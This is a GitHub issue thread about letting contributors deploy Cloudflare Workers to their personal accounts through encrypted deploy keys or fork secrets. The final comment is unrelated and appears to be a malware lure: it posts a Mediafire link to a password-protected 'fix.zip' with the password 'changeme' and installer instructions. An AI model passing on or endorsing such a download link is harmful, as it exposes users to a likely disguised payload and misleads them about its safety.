### ISSUE TITLE
Register Cloudflare Worker Deploy Key

### ISSUE THREAD

**Issue by 0x4007** [ubiquibot/plugin-template#17]
This will be epic to allow us to conveniently test and develop, where our CI will automatically deploy every contributor's commits to their own personal Cloudflare accounts. This circumvents limits and also allows the contributor to modify the worker deployment as they see fit (config, secrets etc) 

---

We can only have [100 workers](https://developers.cloudflare.com/workers/platform/limits/#number-of-workers) on our account. This seems like a bad solution. This should deploy on each developer's personal cloudflare accounts instead, [like I mentioned](https://github.com/ubiquibot/plugins-wishlist/issues/36#issuecomment-2303382955) in the issue discussion. 

It could be interesting to register a cloudflare key in a similar way we do wallet registrations per user. We can allow them to encrypt using our X25519 key with an adjustment to that evm private key encryption app. 

Then they can safely post their encrypted cloudflare key to github comments and nobody but the bot can use it. 

_Originally posted by @0x4007 in https://github.com/ubiquibot/plugin-template/pull/16#issuecomment-2314148762_

**Comment by gentlementlegen** [comment]
The workflow I created won't deploy inside our Cloudflare but on the owner of the branch, meaning the contributor's personal account. Creating pull-requests does not create a branch on our repository, so no deployment occurs.

**Comment by 0x4007** [comment]
Turns out that the contributor can simply set their Cloudflare key in their own secrets on their fork, and it will be able to deploy to their own Cloudflare account when they are working on a pull.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
